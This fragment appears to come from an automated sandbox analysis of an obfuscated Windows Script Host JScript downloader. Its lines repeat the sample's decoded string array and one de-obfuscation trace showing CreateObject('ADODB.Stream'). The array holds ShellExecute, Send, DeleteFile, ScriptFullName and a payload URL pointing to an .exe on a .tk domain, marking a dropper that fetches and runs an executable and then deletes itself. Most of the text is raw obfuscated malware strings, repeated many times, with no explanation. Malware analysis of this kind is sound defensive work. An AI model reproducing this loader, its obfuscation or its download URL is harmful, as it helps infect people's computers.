                                                                                                                                                                                                                                                                                                                                            var Stream = WScript[_0x115fc7 ( 0x8f ) ] ( _0x155c25 ( 0x7f, _0x56566c ( 0xed ) ) );
                                                                                                                                                                                                                                                                                                                                            • _0x115fc7(143) ➔ "CreateObject"
                                                                                                                                                                                                                                                                                                                                            • _0x56566c(237) ➔ "BQ9o"
                                                                                                                                                                                                                                                                                                                                            • _0x155c25(127,"BQ9o") ➔ "ADODB.Stream"
                                                                                                                                                                                                                                                                                                                                            • Windows Script Host.CreateObject("ADODB.Stream") ➔
                                                                                                                                                                                                                                                                                                                                            158
                                                                                                                                                                                                                                                                                                                                            function _0x3974() {
                                                                                                                                                                                                                                                                                                                                            • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                                                                                                                                                                            159
                                                                                                                                                                                                                                                                                                                                            var _0x42fe7d = [ 'dXnloCodW7pcV8k0', 'uqtdR8kPceWHW5tdNW', 'ShellExecute', 'toString', 'hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof', 'WOqoW6PSsSoAc0BdH0GfCq', '279BGVghm', 'WQLhE3xcLSkBWQ5naCorW6xdUq', 'bYVcLCkh', 'uSkzW6xdIW', 'ECoyWQGeWQzGhSkBtMlcPW', 'RzXUsr', 'W4SFgdRcImkKWOiD', 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=', 'w1vrmSoRW7VdJCkJWOVdGaldVq', 'WQtdNh4FpYK', 'AJirxSkZWOCCya9JWPhdJG', 'shift', 'WPBcTCoPW5misfRdSN7dL8oPbq', 'W4BcISoRW5qtgXxcIx3cPCog', 'EMpdGSkmdSoXsCk+W6u', '428748eDivLq', 'q2iIW7/cNf9lcq/cV8k6WOb2', 'fromCharCode', 'vUkl', 'ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO', 'length', 'WOVdSmovWONdJZGXzKNdMfxcOmo2rq', 'Bhsp', '4(*W', 'qCVKfY', 'WRNdUKyZlrG', 'W5pdICkQkCk1WQ53WQZdRCo6tSoA', 'W6LlWOT6F3X+W7JdK8od', 'DeleteFile', 'W4ZdJrRdRue', '421620Dulpsf', '282elZIVv', 'W6JcQSofWRK', 'Scripting.FileSystemObject', 'BQ9o', '1268392teACcP', 'Send', 'WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt', 'AXxcQSkOWRG', 'WOZcHCkvkCo+WOXZnuxcKKbM', 'W4yuy1BdPSoFWOOIgCo6qge', 'bs19WQHMoNZdH8oAW5eX', 'W69VWRvm', '10MQXdOq', 'AJ3cTmowW6WowIz1WO5WW4O', 'WR8BoCkPbXTiCCo9cW', 'WQ3cNSkvBW', '8ApAyti', 'WQquW65/F8ol', 'W)L8', 'https://tgc8x.tk/tt/VNZVNCXKKJSF.exe', 'A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW', 'WPRdHSkOWQrddhC', 'charCodeAt', 'push', '76392yWuOtG', 'W73dVr7dRxtcHSkIW4xcK27cLSoWWOa', '5991OPUtAM', '13285611Ofkcqp', 'ScriptFullName', 'Position', 'nmkoFSotW53cKq', 'yxSPWPPSBJW', 'AJCsxmk1WOXXxYPeWPJdSmoB' ];
                                                                                                                                                                                                                                                                                                                                              160
                                                                                                                                                                                                                                                                                                                                              _0x3974 =
                                                                                                                                                                                                                                                                                                                                                161
                                                                                                                                                                                                                                                                                                                                                function () {
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                                                                                                                                                                                                                                                                • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                                                                                                                                                                                                                                                                162
                                                                                                                                                                                                                                                                                                                                                return _0x42fe7d;
                                                                                                                                                                                                                                                                                                                                                  163
                                                                                                                                                                                                                                                                                                                                                  };
                                                                                                                                                                                                                                                                                                                                                    164
                                                                                                                                                                                                                                                                                                                                                    return _0x3974 ( );
